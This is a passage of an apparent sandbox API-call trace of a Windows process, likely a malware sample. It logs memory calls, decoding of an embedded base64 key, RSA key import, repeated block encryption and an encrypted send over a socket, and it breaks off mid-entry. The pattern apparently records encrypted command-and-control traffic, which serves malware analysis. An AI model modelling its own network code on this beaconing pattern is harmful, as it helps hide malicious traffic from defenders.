(_Block=0x0) [0135.901] memchr (_Buf=0x3f68335, _Val=32, _MaxCount=0xd49) returned 0x3f6835e [0135.901] malloc (_Size=0x2a) returned 0x3def3f8 [0135.901] free (_Block=0x0) [0135.901] malloc (_Size=0x540) returned 0x60e6c0 [0135.901] free (_Block=0x3dd48d8) [0135.901] free (_Block=0x0) [0135.901] memchr (_Buf=0x3f6835f, _Val=32, _MaxCount=0xd1f) returned 0x3f68388 [0135.901] malloc (_Size=0x2a) returned 0x3def1c8 [0135.901] free (_Block=0x0) [0135.901] free (_Block=0x0) [0135.901] memchr (_Buf=0x3f68389, _Val=32, _MaxCount=0xcf5) returned 0x3f683b2 [0135.901] malloc (_Size=0x2a) returned 0x3def078 [0135.901] free (_Block=0x0) [0135.901] free (_Block=0x0) [0135.901] memchr (_Buf=0x3f683b3, _Val=32, _MaxCount=0xccb) returned 0x3f683dc [0135.901] malloc (_Size=0x2a) returned 0x3def158 [0135.902] free (_Block=0x0) [0135.902] free (_Block=0x0) [0135.902] memchr (_Buf=0x3f683dd, _Val=32, _MaxCount=0xca1) returned 0x3f68406 [0135.902] malloc (_Size=0x2a) returned 0x3def318 [0135.902] free (_Block=0x0) [0135.902] free (_Block=0x0) [0135.902] memchr (_Buf=0x3f68407, _Val=32, _MaxCount=0xc77) returned 0x3f68430 [0135.902] malloc (_Size=0x2a) returned 0x3def4d8 [0135.902] free (_Block=0x0) [0135.902] free (_Block=0x0) [0135.902] memchr (_Buf=0x3f68431, _Val=32, _MaxCount=0xc4d) returned 0x3f6845a [0135.902] malloc (_Size=0x2a) returned 0x3def2a8 [0135.902] free (_Block=0x0) [0135.902] free (_Block=0x0) [0135.902] memchr (_Buf=0x3f6845b, _Val=32, _MaxCount=0xc23) returned 0x3f68484 [0135.902] malloc (_Size=0x2a) returned 0x3def6d0 [0135.902] free (_Block=0x0) [0135.902] free (_Block=0x0) [0135.902] memchr (_Buf=0x3f68485, _Val=32, _MaxCount=0xbf9) returned 0x3f684ae [0135.902] malloc (_Size=0x2a) returned 0x3def3c0 [0135.902] free (_Block=0x0) [0135.902] free (_Block=0x0) [0135.902] memchr (_Buf=0x3f684af, _Val=32, _MaxCount=0xbcf) returned 0x3f684d8 [0135.903] malloc (_Size=0x2a) returned 0x3def660 [0135.903] free (_Block=0x0) [0135.903] free (_Block=0x0) [0135.903] memchr (_Buf=0x3f684d9, _Val=32, _MaxCount=0xba5) returned 0x3f68502 [0135.903] malloc (_Size=0x2a) returned 0x3def040 [0135.903] free (_Block=0x0) [0135.903] free (_Block=0x0) [0135.903] memchr (_Buf=0x3f68503, _Val=32, _MaxCount=0xb7b) returned 0x3f6852c [0135.903] malloc (_Size=0x2a) returned 0x3def238 [0135.903] free (_Block=0x0) [0135.903] free (_Block=0x0) [0135.903] memchr (_Buf=0x3f6852d, _Val=32, _MaxCount=0xb51) returned 0x3f68556 [0135.903] malloc (_Size=0x2a) returned 0x3def190 [0135.903] free (_Block=0x0) [0135.903] free (_Block=0x0) [0135.903] memchr (_Buf=0x3f68557, _Val=32, _MaxCount=0xb27) returned 0x3f68580 [0135.903] malloc (_Size=0x2a) returned 0x3def2e0 [0135.903] free (_Block=0x0) [0135.903] free (_Block=0x0) [0135.903] memchr (_Buf=0x3f68581, _Val=32, _MaxCount=0xafd) returned 0x3f685aa [0135.903] malloc (_Size=0x2a) returned 0x3def708 [0135.904] free (_Block=0x0) [0135.904] free (_Block=0x0) [0135.904] memchr (_Buf=0x3f685ab, _Val=32, _MaxCount=0xad3) returned 0x3f685d4 [0135.904] malloc (_Size=0x2a) returned 0x3def0b0 [0135.904] free (_Block=0x0) [0135.904] free (_Block=0x0) [0135.904] memchr (_Buf=0x3f685d5, _Val=32, _MaxCount=0xaa9) returned 0x3f685fe [0135.904] malloc (_Size=0x2a) returned 0x3def350 [0135.904] free (_Block=0x0) [0135.904] free (_Block=0x0) [0135.904] memchr (_Buf=0x3f685ff, _Val=32, _MaxCount=0xa7f) returned 0x3f68628 [0135.904] malloc (_Size=0x2a) returned 0x3def200 [0135.904] free (_Block=0x0) [0135.904] free (_Block=0x0) [0135.904] memchr (_Buf=0x3f68629, _Val=32, _MaxCount=0xa55) returned 0x3f68652 [0135.904] malloc (_Size=0x2a) returned 0x3def698 [0135.904] free (_Block=0x0) [0135.904] free (_Block=0x0) [0135.904] memchr (_Buf=0x3f68653, _Val=32, _MaxCount=0xa2b) returned 0x3f6867c [0135.904] malloc (_Size=0x2a) returned 0x3def388 [0135.904] free (_Block=0x0) [0135.904] free (_Block=0x0) [0135.904] memchr (_Buf=0x3f6867d, _Val=32, _MaxCount=0xa01) returned 0x3f686a6 [0135.905] malloc (_Size=0x2a) returned 0x3def270 [0135.905] free (_Block=0x0) [0135.905] free (_Block=0x0) [0135.905] memchr (_Buf=0x3f686a7, _Val=32, _MaxCount=0x9d7) returned 0x3f686d0 [0135.905] malloc (_Size=0x2a) returned 0x3def430 [0135.905] free (_Block=0x0) [0135.905] free (_Block=0x0) [0135.905] memchr (_Buf=0x3f686d1, _Val=32, _MaxCount=0x9ad) returned 0x3f686fa [0135.905] malloc (_Size=0x2a) returned 0x3def468 [0135.905] free (_Block=0x0) [0135.905] free (_Block=0x0) [0135.906] memchr (_Buf=0x3f686fb, _Val=32, _MaxCount=0x983) returned 0x3f68724 [0135.906] malloc (_Size=0x2a) returned 0x3def5b8 [0135.906] free (_Block=0x0) [0135.906] free (_Block=0x0) [0135.906] memchr (_Buf=0x3f68725, _Val=32, _MaxCount=0x959) returned 0x3f6874e [0135.906] malloc (_Size=0x2a) returned 0x3def4a0 [0135.906] free (_Block=0x0) [0135.906] free (_Block=0x0) [0135.906] memchr (_Buf=0x3f6874f, _Val=32, _MaxCount=0x92f) returned 0x3f68778 [0135.906] malloc (_Size=0x2a) returned 0x3def5f0 [0135.906] free (_Block=0x0) [0135.906] free (_Block=0x0) [0135.906] memchr (_Buf=0x3f68779, _Val=32, _MaxCount=0x905) returned 0x3f687a2 [0135.906] malloc (_Size=0x2a) returned 0x3def628 [0135.906] free (_Block=0x0) [0135.906] free (_Block=0x0) [0135.906] memchr (_Buf=0x3f687a3, _Val=32, _MaxCount=0x8db) returned 0x3f687cc [0135.906] malloc (_Size=0x2a) returned 0x3def778 [0135.906] free (_Block=0x0) [0135.906] free (_Block=0x0) [0135.906] memchr (_Buf=0x3f687cd, _Val=32, _MaxCount=0x8b1) returned 0x3f687f6 [0135.906] malloc (_Size=0x2a) returned 0x3def7b0 [0135.906] free (_Block=0x0) [0135.907] free (_Block=0x0) [0135.907] memchr (_Buf=0x3f687f7, _Val=32, _MaxCount=0x887) returned 0x3f68820 [0135.907] malloc (_Size=0x2a) returned 0x3def740 [0135.907] free (_Block=0x0) [0135.907] free (_Block=0x0) [0135.907] memchr (_Buf=0x3f68821, _Val=32, _MaxCount=0x85d) returned 0x3f6884a [0135.907] malloc (_Size=0x2a) returned 0x60d250 [0135.907] free (_Block=0x0) [0135.907] free (_Block=0x0) [0135.907] memchr (_Buf=0x3f6884b, _Val=32, _MaxCount=0x833) returned 0x3f68874 [0135.907] malloc (_Size=0x2a) returned 0x60d288 [0135.907] free (_Block=0x0) [0135.907] free (_Block=0x0) [0135.907] memchr (_Buf=0x3f68875, _Val=32, _MaxCount=0x809) returned 0x3f6889e [0135.907] malloc (_Size=0x2a) returned 0x60d170 [0135.907] free (_Block=0x0) [0135.907] free (_Block=0x0) [0135.907] memchr (_Buf=0x3f6889f, _Val=32, _MaxCount=0x7df) returned 0x3f688c8 [0135.908] CryptStringToBinaryA (in: pszString="uK1Br4qHsWvYyzsnxGmOwAd2aqFlk1/6hYdgxNTeKBs=", cchString=0x2c, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.908] CryptStringToBinaryA (in: pszString="uK1Br4qHsWvYyzsnxGmOwAd2aqFlk1/6hYdgxNTeKBs=", cchString=0x2c, dwFlags=0x6, pbBinary=0x3d802b0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d802b0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.908] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648db8 | out: pbBuffer=0x3648db8) returned 1 [0135.909] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x3d815c8, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x339fa54, pcbStructInfo=0x339fa2c | out: pvStructInfo=0x339fa54, pcbStructInfo=0x339fa2c) returned 1 [0135.909] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa54, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa50 | out: phKey=0x339fa50*=0x432938) returned 1 [0135.909] CryptEncrypt (in: hKey=0x432938, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x60a248*, pdwDataLen=0x339fa20*=0x56, dwBufLen=0x80 | out: pbData=0x60a248*, pdwDataLen=0x339fa20*=0x80) returned 1 [0135.909] CryptDestroyKey (hKey=0x432938) returned 1 [0135.909] CryptImportKey (in: hProv=0x3cf450, pbData=0x339faf0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339faec | out: phKey=0x339faec*=0x432738) returned 1 [0135.909] CryptSetKeyParam (hKey=0x432738, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0135.909] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10, dwBufLen=0x10 | out: pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10) returned 1 [0135.909] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10, dwBufLen=0x10 | out: pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10) returned 1 [0135.909] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10, dwBufLen=0x10 | out: pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10) returned 1 [0135.909] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10, dwBufLen=0x10 | out: pbData=0x339fa00*, pdwDataLen=0x339f964*=0x10) returned 1 [0135.909] CryptDestroyKey (hKey=0x432738) returned 1 [0135.909] CryptHashData (hHash=0x432b78, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0135.909] CryptDuplicateHash (in: hHash=0x432b78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb4c | out: phHash=0x339fb4c) returned 1 [0135.910] CryptGetHashParam (in: hHash=0x432938, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fae4, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fae4) returned 1 [0135.910] CryptDestroyHash (hHash=0x432938) returned 1 [0135.910] free (_Block=0x3f65280) [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.910] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.911] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.912] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.912] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.912] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.912] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.912] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa9c*=0x10) returned 1 [0135.912] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fad4, MessageSeqNo=0x0 | out: pMessage=0x339fad4) returned 0x0 [0135.912] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0135.913] free (_Block=0x3d81e60) [0135.913] free (_Block=0x3594e20) [0135.913] free (_Block=0x3df02e8) [0135.913] free (_Block=0x605a18) [0135.913] free (_Block=0x3594d18) [0135.913] GetTickCount () returned 0x1162ec8 [0135.913] malloc (_Size=0x10) returned 0x3648e90 [0135.913] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e90*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0135.913] free (_Block=0x3648e90) [0135.913] GetTickCount () returned 0x1162ec8 [0135.913] malloc (_Size=0x10) returned 0x3648ce0 [0135.913] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ce0*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0137.311] free (_Block=0x3648ce0) [0137.312] GetTickCount () returned 0x1163446 [0137.312] free (_Block=0x0) [0137.312] malloc (_Size=0x24) returned 0x60dd68 [0137.312] free (_Block=0x0) [0137.312] malloc (_Size=0x8) returned 0x3f4c028 [0137.312] free (_Block=0x0) [0137.312] free (_Block=0x0) [0137.312] memchr (_Buf=0x60dd6f, _Val=47, _MaxCount=0x1c) returned 0x60dd85 [0137.312] malloc (_Size=0x17) returned 0x3f65480 [0137.312] free (_Block=0x0) [0137.312] free (_Block=0x0) [0137.312] memchr (_Buf=0x3f65480, _Val=58, _MaxCount=0x16) returned 0x0 [0137.312] malloc (_Size=0x8) returned 0x3f4bf58 [0137.312] free (_Block=0x0) [0137.312] free (_Block=0x3f4bf58) [0137.313] malloc (_Size=0x17) returned 0x3f65320 [0137.313] free (_Block=0x0) [0137.313] free (_Block=0x0) [0137.313] malloc (_Size=0x7) returned 0x3f4bfa8 [0137.313] free (_Block=0x0) [0137.313] free (_Block=0x0) [0137.313] malloc (_Size=0x11) returned 0x3f65440 [0137.313] free (_Block=0x0) [0137.313] malloc (_Size=0x11) returned 0x3f654a0 [0137.314] free (_Block=0x0) [0137.314] malloc (_Size=0xa) returned 0x3648d70 [0137.314] free (_Block=0x0) [0137.314] malloc (_Size=0x10) returned 0x3648ec0 [0137.314] free (_Block=0x0) [0137.314] malloc (_Size=0x50) returned 0x3d9ada8 [0137.314] free (_Block=0x3648ec0) [0137.314] malloc (_Size=0x150) returned 0x3d81010 [0137.314] free (_Block=0x3d9ada8) [0137.314] malloc (_Size=0x550) returned 0x3df00e0 [0137.314] free (_Block=0x3d81010) [0137.314] malloc (_Size=0x1550) returned 0x3f68010 [0137.315] free (_Block=0x3df00e0) [0137.315] malloc (_Size=0x5550) returned 0x348c1b8 [0137.315] free (_Block=0x3f68010) [0137.316] free (_Block=0x0) [0137.316] free (_Block=0x0) [0137.316] free (_Block=0x0) [0137.316] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969c4 [0137.316] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa6c | out: phHash=0x339fa6c) returned 1 [0137.316] CryptHashData (hHash=0x4327f8, pbData=0x339faa4, dwDataLen=0x5, dwFlags=0x0) returned 1 [0137.316] malloc (_Size=0x14) returned 0x3f65380 [0137.316] free (_Block=0x0) [0137.316] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f65380, pdwDataLen=0x339fa64, dwFlags=0x0 | out: pbData=0x3f65380, pdwDataLen=0x339fa64) returned 1 [0137.316] CryptDestroyHash (hHash=0x4327f8) returned 1 [0137.316] malloc (_Size=0x10) returned 0x3648e00 [0137.316] free (_Block=0x0) [0137.317] malloc (_Size=0x44) returned 0x3defbd0 [0137.317] free (_Block=0x3648e00) [0137.317] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339faac | out: phHash=0x339faac) returned 1 [0137.317] CryptHashData (hHash=0x432db8, pbData=0x3defbd0, dwDataLen=0x1e, dwFlags=0x0) returned 1 [0137.317] malloc (_Size=0x14) returned 0x3f654c0 [0137.317] free (_Block=0x0) [0137.317] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f654c0, pdwDataLen=0x339faa4, dwFlags=0x0 | out: pbData=0x3f654c0, pdwDataLen=0x339faa4) returned 1 [0137.317] CryptDestroyHash (hHash=0x432db8) returned 1 [0137.317] free (_Block=0x3defbd0) [0137.317] free (_Block=0x3f65380) [0137.318] malloc (_Size=0x10) returned 0x3648cc8 [0137.318] free (_Block=0x0) [0137.318] free (_Block=0x3f654c0) [0137.318] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969c4 [0137.318] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa6c | out: phHash=0x339fa6c) returned 1 [0137.318] CryptHashData (hHash=0x432bf8, pbData=0x339faa4, dwDataLen=0x5, dwFlags=0x0) returned 1 [0137.318] malloc (_Size=0x14) returned 0x3f651e0 [0137.318] free (_Block=0x0) [0137.318] CryptGetHashParam (in: hHash=0x432bf8, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x339fa64, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x339fa64) returned 1 [0137.318] CryptDestroyHash (hHash=0x432bf8) returned 1 [0137.318] malloc (_Size=0x10) returned 0x3648f38 [0137.318] free (_Block=0x0) [0137.318] malloc (_Size=0x44) returned 0x3deffe0 [0137.318] free (_Block=0x3648f38) [0137.318] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339faac | out: phHash=0x339faac) returned 1 [0137.318] CryptHashData (hHash=0x4329f8, pbData=0x3deffe0, dwDataLen=0x1e, dwFlags=0x0) returned 1 [0137.319] malloc (_Size=0x14) returned 0x3f65460 [0137.319] free (_Block=0x0) [0137.319] CryptGetHashParam (in: hHash=0x4329f8, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x339faa4, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x339faa4) returned 1 [0137.319] CryptDestroyHash (hHash=0x4329f8) returned 1 [0137.319] free (_Block=0x3deffe0) [0137.319] free (_Block=0x3f651e0) [0137.319] malloc (_Size=0x50) returned 0x3d9aa38 [0137.319] free (_Block=0x3648cc8) [0137.319] free (_Block=0x3f65460) [0137.319] free (_Block=0x348c1b8) [0137.319] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x14, pbBuffer=0x339fc04 | out: pbBuffer=0x339fc04) returned 1 [0137.320] SetEvent (hEvent=0x3a4) returned 1 [0137.320] malloc (_Size=0x14) returned 0x3f65460 [0137.320] free (_Block=0x0) [0137.320] free (_Block=0x0) [0137.320] malloc (_Size=0x1fd) returned 0x3594d18 [0137.320] free (_Block=0x0) [0137.320] CryptHashData (hHash=0x432938, pbData=0x3594d18, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0137.320] CryptDuplicateHash (in: hHash=0x432938, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb0c | out: phHash=0x339fb0c) returned 1 [0137.320] malloc (_Size=0x14) returned 0x3f651e0 [0137.320] free (_Block=0x0) [0137.320] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x339faa4, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x339faa4) returned 1 [0137.320] CryptDestroyHash (hHash=0x4327f8) returned 1 [0137.320] free (_Block=0x3f651e0) [0137.320] malloc (_Size=0x1fd) returned 0x3d81e60 [0137.320] free (_Block=0x0) [0137.320] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: 